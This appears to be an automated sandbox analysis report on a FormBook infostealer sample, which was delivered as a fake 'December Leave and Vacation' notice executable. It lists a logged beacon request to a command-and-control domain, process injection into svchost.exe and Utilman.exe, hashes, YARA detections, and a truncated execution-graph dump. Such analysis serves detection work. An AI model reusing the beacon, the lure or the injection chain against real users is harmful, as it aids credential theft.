                                                    Data Ascii: StWXF0Jx=Z4gtal9D9muTgaKJNUs+6otwjIzCEo0lc9S/cBBzXT7Sjl1IWXsLyrcct2kuUmCQTbhR2WHXZtxCFaNUqL8DOvJX0QEVThCilVb3/M4jyN6A2YdQ5Lkf/2GZ+NQnh7Q/EJ/mAy/pklC6dzcH5xPODnDRqcqX1+OEHB8fH5pab0I7Hzzz634M2sb1Vfcj19VgmUcklBrLORyB0CApoDrHIB6vwZr34+/ZO0ira2lEyad2a4s6o+AI4Fat7OqwisYOryO8m1ppiLNEn9oWkr9yg1Obx862od35zV6Ht3s5vkBdFthjeBxGFNXNB8aRnjvPzdPavss2MnRK7dYLxjHbim2+z0w/mPp9GFtBx24ybIt9GF77y+Uo9YvvZKvaF7xSClb+Sx8N4mopS9T3SxlmnOqzd5jE3D9CDeX4NmjWEDlXN9IC7Kfkwmlf53UP4se98t5uSF/i72gQKHf/Ih12DIJH1mXV3AlRhu3PYiuimSAMky/lh8D5mj5FwKN/9liJUYRnskMLH55shdypXrCzMvkkXBqkm4fTxr1BQjDMB+Omj5QXXrw3j0Zxgf62mmcmdxP3HcExGD8WkOjtRUW2gdoDZJfj3AYvMAeb0phsbMRVKJIGoCMvfQ4vLK52//2QQy+QK+hln7bZtdYjyQr9jurshSj/4eajuPyPrSuNXX8SsyHjatd9i1sItibx9t0gphNWK/24/HezQcUp+RYAn5QXFIPuF2zKYdti8drJH/CA0SkCkK5L8/9a3mNISCeGHYZ9Vy6ubAz6YOI9Aq7SvhnYp90gJ6+421hvs34UajZX6hSmFl1ur9KNqedcerHSlrhSA3q5+3mdknuHn61nrPWw5UFu6HXUbRFUo92HWvJvRIWtQ9b7r2Qlm68zmQVekSyAc2m+WMMgRRuFOd58+bzaY1bKEbEqwDlxNBrQaC4UyHPpI34Oect5k919bmTbPBx/k8zNOXPB5mXrmgdV8yPtlTT7qdgZ1Uxhpf24UNw [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.55000038.47.232.194806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:19:11.166989088 CET524OUTGET /6rpr/?StWXF0Jx=U6INZSFl9w/0w7eUclNH1uQloYv6GNk9LcyHZGh1ex/X83RYU2QqyJ4e030xcVzYUaotyR6kZc9FdKJmpo1DO/tZ9h4UUwPPiw7Wz8cuuN6k65sGyuw58EydjYd8v6xFYg==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:19:12.686775923 CET312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 21 Nov 2024 15:19:12 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66e02f2c-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:10:15:03
                                                    Start date:21/11/2024
                                                    Path:C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
                                                    Imagebase:0xf80000
                                                    File size:1'207'808 bytes
                                                    MD5 hash:201AD7754669B4D766349530ADCCA029
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:10:15:04
                                                    Start date:21/11/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
                                                    Imagebase:0xcd0000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:10:15:32
                                                    Start date:21/11/2024
                                                    Path:C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe"
                                                    Imagebase:0xd50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:5
                                                    Start time:10:15:35
                                                    Start date:21/11/2024
                                                    Path:C:\Windows\SysWOW64\Utilman.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\Utilman.exe"
                                                    Imagebase:0x790000
                                                    File size:97'280 bytes
                                                    MD5 hash:4F59EE095E37A83CDCB74091C807AFA9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:10:15:50
                                                    Start date:21/11/2024
                                                    Path:C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe"
                                                    Imagebase:0xd50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:10:16:03
                                                    Start date:21/11/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff79f9e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.9%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:8.2%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:60
                                                      execution_graph 94400 ff19dd 94405 f84a30 94400->94405 94402 ff19f1 94425 fa0f0a 52 API calls __cinit 94402->94425 94404 ff19fb 94406 f84a40 __ftell_nolock 94405->94406 94426 f8d7f7 94406->94426 94410 f84aff 94438 f8363c 94410->94438 94417 f8d7f7 48 API calls 94418 f84b32 94417->94418 94460 f849fb 94418->94460 94420 f84b43 Mailbox 94420->94402 94421 f861a6 48 API calls 94424 f84b3d _wcscat Mailbox __NMSG_WRITE 94421->94424 94423 f864cf 48 API calls 94423->94424 94424->94420 94424->94421 94424->94423 94474 f8ce19 94424->94474 94425->94404 94480 f9f4ea 94426->94480 94428 f8d818 94429 f9f4ea 48 API calls 94428->94429 94430 f84af6 94429->94430 94431 f85374 94430->94431 94511 faf8a0 94431->94511 94434 f8ce19 48 API calls 94435 f853a7 94434->94435 94513 f8660f 94435->94513 94437 f853b1 Mailbox 94437->94410 94439 f83649 __ftell_nolock 94438->94439 94560 f8366c GetFullPathNameW 94439->94560 94441 f8365a 94442 f86a63 48 API calls 94441->94442 94443 f83669 94442->94443 94444 f8518c 94443->94444 94445 f85197 94444->94445 94446 ff1ace 94445->94446 94447 f8519f 94445->94447 94449 f86b4a 48 API calls 94446->94449 94562 f85130 94447->94562 94451 ff1adb __NMSG_WRITE 94449->94451 94450 f84b18 94454 f864cf 94450->94454 94452 f9ee75 48 API calls 94451->94452 94453 ff1b07 _memcpy_s 94452->94453 94455 f8651b 94454->94455 94459 f864dd _memcpy_s 94454->94459 94458 f9f4ea 48 API calls 94455->94458 94456 f9f4ea 48 API calls 94457 f84b29 94456->94457 94457->94417 94458->94459 94459->94456 94577 f8bcce 94460->94577 94463 ff41cc RegQueryValueExW 94465 ff4246 RegCloseKey 94463->94465 94466 ff41e5 94463->94466 94464 f84a2b 94464->94424 94467 f9f4ea 48 API calls 94466->94467 94468 ff41fe 94467->94468 94583 f847b7 94468->94583 94471 ff4224 94472 f86a63 48 API calls 94471->94472 94473 ff423b 94472->94473 94473->94465 94475 f8ce28 __NMSG_WRITE 94474->94475 94476 f9ee75 48 API calls 94475->94476 94477 f8ce50 _memcpy_s 94476->94477 94478 f9f4ea 48 API calls 94477->94478 94479 f8ce66 94478->94479 94479->94424 94483 f9f4f2 __calloc_impl 94480->94483 94482 f9f50c 94482->94428 94483->94482 94484 f9f50e std::exception::exception 94483->94484 94489 fa395c 94483->94489 94503 fa6805 RaiseException 94484->94503 94486 f9f538 94504 fa673b 47 API calls _free 94486->94504 94488 f9f54a 94488->94428 94490 fa39d7 __calloc_impl 94489->94490 94491 fa3968 __calloc_impl 94489->94491 94510 fa7c0e 47 API calls __getptd_noexit 94490->94510 94494 fa399b RtlAllocateHeap 94491->94494 94496 fa3973 94491->94496 94498 fa39c3 94491->94498 94501 fa39c1 94491->94501 94494->94491 94495 fa39cf 94494->94495 94495->94483 94496->94491 94505 fa81c2 47 API calls 2 library calls 94496->94505 94506 fa821f 47 API calls 7 library calls 94496->94506 94507 fa1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94496->94507 94508 fa7c0e 47 API calls __getptd_noexit 94498->94508 94509 fa7c0e 47 API calls __getptd_noexit 94501->94509 94503->94486 94504->94488 94505->94496 94506->94496 94508->94501 94509->94495 94510->94495 94512 f85381 GetModuleFileNameW 94511->94512 94512->94434 94514 faf8a0 __ftell_nolock 94513->94514 94515 f8661c GetFullPathNameW 94514->94515 94520 f86a63 94515->94520 94517 f86643 94531 f86571 94517->94531 94521 f86adf 94520->94521 94523 f86a6f __NMSG_WRITE 94520->94523 94548 f8b18b 94521->94548 94524 f86a8b 94523->94524 94525 f86ad7 94523->94525 94535 f86b4a 94524->94535 94547 f8c369 48 API calls 94525->94547 94528 f86a95 94538 f9ee75 94528->94538 94529 f86ab6 _memcpy_s 94529->94517 94532 f8657f 94531->94532 94533 f8b18b 48 API calls 94532->94533 94534 f8658f 94533->94534 94534->94437 94536 f9f4ea 48 API calls 94535->94536 94537 f86b54 94536->94537 94537->94528 94539 f9f4ea __calloc_impl 94538->94539 94540 fa395c __malloc_crt 47 API calls 94539->94540 94541 f9f50c 94539->94541 94542 f9f50e std::exception::exception 94539->94542 94540->94539 94541->94529 94552 fa6805 RaiseException 94542->94552 94544 f9f538 94553 fa673b 47 API calls _free 94544->94553 94546 f9f54a 94546->94529 94547->94529 94549 f8b1a2 _memcpy_s 94548->94549 94550 f8b199 94548->94550 94549->94529 94550->94549 94554 f8bdfa 94550->94554 94552->94544 94553->94546 94555 f8be0d 94554->94555 94559 f8be0a _memcpy_s 94554->94559 94556 f9f4ea 48 API calls 94555->94556 94557 f8be17 94556->94557 94558 f9ee75 48 API calls 94557->94558 94558->94559 94559->94549 94561 f8368a 94560->94561 94561->94441 94563 f8513f __NMSG_WRITE 94562->94563 94564 ff1b27 94563->94564 94565 f85151 94563->94565 94567 f86b4a 48 API calls 94564->94567 94572 f8bb85 94565->94572 94569 ff1b34 94567->94569 94568 f8515e _memcpy_s 94568->94450 94570 f9ee75 48 API calls 94569->94570 94571 ff1b57 _memcpy_s 94570->94571 94573 f8bb9b 94572->94573 94575 f8bb96 _memcpy_s 94572->94575 94574 f9ee75 48 API calls 94573->94574 94576 ff1b77 94573->94576 94574->94575 94575->94568 94576->94576 94578 f8bce8 94577->94578 94579 f84a0a RegOpenKeyExW 94577->94579 94580 f9f4ea 48 API calls 94578->94580 94579->94463 94579->94464 94581 f8bcf2 94580->94581 94582 f9ee75 48 API calls 94581->94582 94582->94579 94584 f9f4ea 48 API calls 94583->94584 94585 f847c9 RegQueryValueExW 94584->94585 94585->94471 94585->94473 94586 ff9bec 94590 f90ae0 _memcpy_s Mailbox 94586->94590 94588 f9f4ea 48 API calls 94588->94590 94589 f91526 Mailbox 94760 fccc5c 86 API calls 4 library calls 94589->94760 94590->94588 94590->94589 94612 f8ce19 48 API calls 94590->94612 94617 f8fec8 94590->94617 94618 f8ffe1 Mailbox 94590->94618 94623 ffa706 94590->94623 94625 fb97ed InterlockedDecrement 94590->94625 94629 f8fe30 94590->94629 94658 fe0d09 94590->94658 94661 fe0d1d 94590->94661 94664 fd6ff0 94590->94664 94673 fdf0ac 94590->94673 94705 fca6ef 94590->94705 94711 fde822 94590->94711 94753 fdef61 82 API calls 2 library calls 94590->94753 94593 f9f4ea 48 API calls 94593->94617 94596 f91473 94762 fccc5c 86 API calls 4 library calls 94596->94762 94597 f90509 94763 fccc5c 86 API calls 4 library calls 94597->94763 94598 f9146e 94603 f86eed 48 API calls 94598->94603 94601 ffa246 94754 f86eed 94601->94754 94602 ffa922 94603->94618 94606 f86eed 48 API calls 94606->94617 94608 ffa873 94609 fb97ed InterlockedDecrement 94609->94617 94610 f8d7f7 48 API calls 94610->94617 94611 ffa30e 94611->94618 94758 fb97ed InterlockedDecrement 94611->94758 94612->94590 94614 ffa973 94764 fccc5c 86 API calls 4 library calls 94614->94764 94615 fa0f0a 52 API calls __cinit 94615->94617 94617->94593 94617->94596 94617->94597 94617->94598 94617->94601 94617->94606 94617->94609 94617->94610 94617->94611 94617->94614 94617->94615 94617->94618 94621 f915b5 94617->94621 94751 f91820 335 API calls 2 library calls 94617->94751 94752 f91d10 59 API calls Mailbox 94617->94752 94619 ffa982 94761 fccc5c 86 API calls 4 library calls 94621->94761 94759 fccc5c 86 API calls 4 library calls 94623->94759 94625->94590 94630 f8fe50 94629->94630 94654 f8fe7e 94629->94654 94631 f9f4ea 48 API calls 94630->94631 94631->94654 94632 f9146e 94633 f86eed 48 API calls 94632->94633 94655 f8ffe1 94633->94655 94634 fb97ed InterlockedDecrement 94634->94654 94635 f8d7f7 48 API calls 94635->94654 94637 f9f4ea 48 API calls 94637->94654 94638 f90509 94770 fccc5c 86 API calls 4 library calls 94638->94770 94641 fa0f0a 52 API calls __cinit 94641->94654 94642 f91473 94769 fccc5c 86 API calls 4 library calls 94642->94769 94643 ffa246 94646 f86eed 48 API calls 94643->94646 94644 ffa922 94644->94590 94646->94655 94648 f86eed 48 API calls 94648->94654 94649 ffa873 94649->94590 94650 ffa30e 94650->94655 94767 fb97ed InterlockedDecrement 94650->94767 94652 ffa973 94771 fccc5c 86 API calls 4 library calls 94652->94771 94654->94632 94654->94634 94654->94635 94654->94637 94654->94638 94654->94641 94654->94642 94654->94643 94654->94648 94654->94650 94654->94652 94654->94655 94657 f915b5 94654->94657 94765 f91820 335 API calls 2 library calls 94654->94765 94766 f91d10 59 API calls Mailbox 94654->94766 94655->94590 94656 ffa982 94768 fccc5c 86 API calls 4 library calls 94657->94768 94772 fdf8ae 94658->94772 94660 fe0d19 94660->94590 94662 fdf8ae 129 API calls 94661->94662 94663 fe0d2d 94662->94663 94663->94590 94665 f8936c 81 API calls 94664->94665 94666 fd702a 94665->94666 94933 f8b470 94666->94933 94668 fd703a 94669 fd705f 94668->94669 94670 f8fe30 335 API calls 94668->94670 94672 fd7063 94669->94672 94961 f8cdb9 48 API calls 94669->94961 94670->94669 94672->94590 94674 f8d7f7 48 API calls 94673->94674 94675 fdf0c0 94674->94675 94676 f8d7f7 48 API calls 94675->94676 94677 fdf0c8 94676->94677 94678 f8d7f7 48 API calls 94677->94678 94679 fdf0d0 94678->94679 94680 f8936c 81 API calls 94679->94680 94684 fdf0de 94680->94684 94681 fdf2f9 Mailbox 94681->94590 94682 f86a63 48 API calls 94682->94684 94683 f8c799 48 API calls 94683->94684 94684->94681 94684->94682 94684->94683 94685 fdf2b3 94684->94685 94687 fdf2ce 94684->94687 94691 f86eed 48 API calls 94684->94691 94694 f8bdfa 48 API calls 94684->94694 94695 fdf2cc 94684->94695 94697 f8bdfa 48 API calls 94684->94697 94702 f8936c 81 API calls 94684->94702 94703 f8518c 48 API calls 94684->94703 94704 f8510d 48 API calls 94684->94704 94688 f8518c 48 API calls 94685->94688 94690 f8518c 48 API calls 94687->94690 94689 fdf2c0 94688->94689 94987 f8510d 94689->94987 94693 fdf2dd 94690->94693 94691->94684 94696 f8510d 48 API calls 94693->94696 94698 fdf175 CharUpperBuffW 94694->94698 94695->94681 94996 f86b68 48 API calls 94695->94996 94696->94695 94699 fdf23a CharUpperBuffW 94697->94699 94976 f8d645 94698->94976 94986 f9d922 55 API calls 2 library calls 94699->94986 94702->94684 94703->94684 94704->94684 94706 fca6fb 94705->94706 94707 f9f4ea 48 API calls 94706->94707 94708 fca709 94707->94708 94709 f8d7f7 48 API calls 94708->94709 94710 fca717 94708->94710 94709->94710 94710->94590 94712 fde84e 94711->94712 94713 fde868 94711->94713 95010 fccc5c 86 API calls 4 library calls 94712->95010 95011 fdccdc 48 API calls 94713->95011 94716 fde871 94717 f8fe30 334 API calls 94716->94717 94718 fde8cf 94717->94718 94719 fde96a 94718->94719 94720 fde916 94718->94720 94750 fde860 Mailbox 94718->94750 94721 fde978 94719->94721 94724 fde9c7 94719->94724 95012 fc9b72 48 API calls 94720->95012 95030 fca69d 48 API calls 94721->95030 94723 fde949 95013 f945e0 94723->95013 94728 f8936c 81 API calls 94724->94728 94724->94750 94726 fde99b 95031 f8bc74 48 API calls 94726->95031 94730 fde9e1 94728->94730 94732 f8bdfa 48 API calls 94730->94732 94731 fde9a3 Mailbox 95032 f93200 94731->95032 94733 fdea05 CharUpperBuffW 94732->94733 94734 fdea1f 94733->94734 94736 fdea26 94734->94736 94737 fdea72 94734->94737 95104 fc9b72 48 API calls 94736->95104 94738 f8936c 81 API calls 94737->94738 94739 fdea7a 94738->94739 95105 f81caa 49 API calls 94739->95105 94742 fdea54 94743 f945e0 334 API calls 94742->94743 94743->94750 94744 fdea84 94745 f8936c 81 API calls 94744->94745 94744->94750 94746 fdea9f 94745->94746 95106 f8bc74 48 API calls 94746->95106 94748 fdeaaf 94749 f93200 334 API calls 94748->94749 94749->94750 94750->94590 94751->94617 94752->94617 94753->94590 94755 f86ef8 94754->94755 94756 f86f00 94754->94756 96181 f8dd47 48 API calls _memcpy_s 94755->96181 94756->94618 94758->94618 94759->94589 94760->94618 94761->94618 94762->94608 94763->94602 94764->94619 94765->94654 94766->94654 94767->94655 94768->94655 94769->94649 94770->94644 94771->94656 94808 f8936c 94772->94808 94774 fdf8ea 94797 fdf92c Mailbox 94774->94797 94828 fe0567 94774->94828 94776 fdfb8b 94777 fdfcfa 94776->94777 94781 fdfb95 94776->94781 94903 fe0688 89 API calls Mailbox 94777->94903 94780 fdfd07 94780->94781 94783 fdfd13 94780->94783 94841 fdf70a 94781->94841 94782 f8936c 81 API calls 94801 fdf984 Mailbox 94782->94801 94783->94797 94788 fdfbc9 94855 f9ed18 94788->94855 94791 fdfbfd 94859 f9c050 94791->94859 94792 fdfbe3 94901 fccc5c 86 API calls 4 library calls 94792->94901 94795 fdfc14 94798 f91b90 48 API calls 94795->94798 94807 fdfc3e 94795->94807 94796 fdfbee GetCurrentProcess TerminateProcess 94796->94791 94797->94660 94800 fdfc2d 94798->94800 94799 fdfd65 94799->94797 94804 fdfd7e FreeLibrary 94799->94804 94802 fe040f 105 API calls 94800->94802 94801->94776 94801->94782 94801->94797 94801->94801 94899 fe29e8 48 API calls _memcpy_s 94801->94899 94900 fdfda5 60 API calls 2 library calls 94801->94900 94802->94807 94804->94797 94807->94799 94870 f91b90 94807->94870 94886 fe040f 94807->94886 94902 f8dcae 50 API calls Mailbox 94807->94902 94809 f89384 94808->94809 94823 f89380 94808->94823 94810 ff4cbd __i64tow 94809->94810 94811 ff4bbf 94809->94811 94812 f89398 94809->94812 94814 f893b0 __itow Mailbox _wcscpy 94809->94814 94815 ff4bc8 94811->94815 94816 ff4ca5 94811->94816 94904 fa172b 80 API calls 3 library calls 94812->94904 94817 f9f4ea 48 API calls 94814->94817 94815->94814 94820 ff4be7 94815->94820 94905 fa172b 80 API calls 3 library calls 94816->94905 94819 f893ba 94817->94819 94822 f8ce19 48 API calls 94819->94822 94819->94823 94821 f9f4ea 48 API calls 94820->94821 94824 ff4c04 94821->94824 94822->94823 94823->94774 94825 f9f4ea 48 API calls 94824->94825 94826 ff4c2a 94825->94826 94826->94823 94827 f8ce19 48 API calls 94826->94827 94827->94823 94829 f8bdfa 48 API calls 94828->94829 94830 fe0582 CharLowerBuffW 94829->94830 94906 fc1f11 94830->94906 94834 f8d7f7 48 API calls 94835 fe05bb 94834->94835 94913 f869e9 48 API calls _memcpy_s 94835->94913 94837 fe05d2 94839 f8b18b 48 API calls 94837->94839 94838 fe061a Mailbox 94838->94801 94840 fe05de Mailbox 94839->94840 94840->94838 94914 fdfda5 60 API calls 2 library calls 94840->94914 94842 fdf725 94841->94842 94843 fdf77a 94841->94843 94844 f9f4ea 48 API calls 94842->94844 94847 fe0828 94843->94847 94846 fdf747 94844->94846 94845 f9f4ea 48 API calls 94845->94846 94846->94843 94846->94845 94848 fe0a53 Mailbox 94847->94848 94853 fe084b _strcat _wcscpy __NMSG_WRITE 94847->94853 94848->94788 94849 f8cf93 58 API calls 94849->94853 94850 f8d286 48 API calls 94850->94853 94851 f8936c 81 API calls 94851->94853 94852 fa395c 47 API calls __malloc_crt 94852->94853 94853->94848 94853->94849 94853->94850 94853->94851 94853->94852 94917 fc8035 50 API calls __NMSG_WRITE 94853->94917 94856 f9ed2d 94855->94856 94857 f9edc5 VirtualProtect 94856->94857 94858 f9ed93 94856->94858 94857->94858 94858->94791 94858->94792 94860 f9c064 94859->94860 94862 f9c069 Mailbox 94859->94862 94918 f9c1af 48 API calls 94860->94918 94868 f9c077 94862->94868 94919 f9c15c 48 API calls 94862->94919 94864 f9f4ea 48 API calls 94866 f9c108 94864->94866 94865 f9c152 94865->94795 94867 f9f4ea 48 API calls 94866->94867 94869 f9c113 94867->94869 94868->94864 94868->94865 94869->94795 94869->94869 94871 f91cf6 94870->94871 94874 f91ba2 94870->94874 94871->94807 94872 f91bae 94877 f91bb9 94872->94877 94921 f9c15c 48 API calls 94872->94921 94874->94872 94875 f9f4ea 48 API calls 94874->94875 94876 ff49c4 94875->94876 94879 f9f4ea 48 API calls 94876->94879 94878 f91c5d 94877->94878 94880 f9f4ea 48 API calls 94877->94880 94878->94807 94885 ff49cf 94879->94885 94881 f91c9f 94880->94881 94882 f91cb2 94881->94882 94920 f82925 48 API calls 94881->94920 94882->94807 94884 f9f4ea 48 API calls 94884->94885 94885->94872 94885->94884 94887 fe0427 94886->94887 94897 fe0443 94886->94897 94888 fe042e 94887->94888 94889 fe044f 94887->94889 94890 fe04f8 94887->94890 94887->94897 94928 fc7c56 50 API calls _strlen 94888->94928 94930 f8cdb9 48 API calls 94889->94930 94931 fc9dc5 103 API calls 94890->94931 94891 fe051e 94891->94807 94896 fe0438 94929 f8cdb9 48 API calls 94896->94929 94897->94891 94922 fa1c9d 94897->94922 94899->94801 94900->94801 94901->94796 94902->94807 94903->94780 94904->94814 94905->94814 94907 fc1f3b __NMSG_WRITE 94906->94907 94908 fc1f79 94907->94908 94910 fc1f6f 94907->94910 94912 fc1ffa 94907->94912 94908->94834 94908->94840 94910->94908 94915 f9d37a 60 API calls 94910->94915 94912->94908 94916 f9d37a 60 API calls 94912->94916 94913->94837 94914->94838 94915->94910 94916->94912 94917->94853 94918->94862 94919->94868 94920->94882 94921->94877 94923 fa1ca6 RtlFreeHeap 94922->94923 94927 fa1ccf _free 94922->94927 94924 fa1cbb 94923->94924 94923->94927 94932 fa7c0e 47 API calls __getptd_noexit 94924->94932 94926 fa1cc1 GetLastError 94926->94927 94927->94891 94928->94896 94929->94897 94930->94897 94931->94897 94932->94926 94962 f86b0f 94933->94962 94935 f8b69b 94969 f8ba85 48 API calls _memcpy_s 94935->94969 94938 f8b6b5 Mailbox 94938->94668 94940 f8bcce 48 API calls 94955 f8b495 94940->94955 94941 ff397b 94973 fc26bc 88 API calls 4 library calls 94941->94973 94944 f8b9e4 94975 fc26bc 88 API calls 4 library calls 94944->94975 94945 ff3973 94945->94938 94947 f8ba85 48 API calls 94947->94955 94949 ff3989 94974 f8ba85 48 API calls _memcpy_s 94949->94974 94951 ff3909 94953 f86b4a 48 API calls 94951->94953 94952 f8bb85 48 API calls 94952->94955 94954 ff3914 94953->94954 94959 f9f4ea 48 API calls 94954->94959 94955->94935 94955->94940 94955->94941 94955->94944 94955->94947 94955->94951 94955->94952 94957 f8bdfa 48 API calls 94955->94957 94960 ff3939 _memcpy_s 94955->94960 94967 f8c413 59 API calls 94955->94967 94968 f8bc74 48 API calls 94955->94968 94970 f8c6a5 49 API calls 94955->94970 94971 f8c799 48 API calls _memcpy_s 94955->94971 94958 f8b66c CharUpperBuffW 94957->94958 94958->94955 94959->94960 94972 fc26bc 88 API calls 4 library calls 94960->94972 94961->94672 94963 f9f4ea 48 API calls 94962->94963 94964 f86b34 94963->94964 94965 f86b4a 48 API calls 94964->94965 94966 f86b43 94965->94966 94966->94955 94967->94955 94968->94955 94969->94938 94970->94955 94971->94955 94972->94945 94973->94949 94974->94945 94975->94945 94977 f8d654 94976->94977 94985 f8d67e 94976->94985 94978 f8d65b 94977->94978 94981 f8d6c2 94977->94981 94979 f8d6ab 94978->94979 94980 f8d666 94978->94980 94979->94985 94998 f9dce0 53 API calls 94979->94998 94997 f8d9a0 53 API calls __cinit 94980->94997 94981->94979 94999 f9dce0 53 API calls 94981->94999 94985->94684 94986->94684 94988 f8511f 94987->94988 94989 ff1be7 94987->94989 95000 f8b384 94988->95000 95009 fba58f 48 API calls _memcpy_s 94989->95009 94992 f8512b 94992->94695 94993 ff1bf1 94994 f86eed 48 API calls 94993->94994 94995 ff1bf9 Mailbox 94994->94995 94996->94681 94997->94985 94998->94985 94999->94979 95001 f8b392 95000->95001 95008 f8b3c5 _memcpy_s 95000->95008 95002 f8b3b8 95001->95002 95003 f8b3fd 95001->95003 95001->95008 95004 f8bb85 48 API calls 95002->95004 95005 f9f4ea 48 API calls 95003->95005 95004->95008 95006 f8b407 95005->95006 95007 f9f4ea 48 API calls 95006->95007 95007->95008 95008->94992 95009->94993 95010->94750 95011->94716 95012->94723 95014 f9479f 95013->95014 95015 f94637 95013->95015 95018 f8ce19 48 API calls 95014->95018 95016 ff6e05 95015->95016 95017 f94643 95015->95017 95019 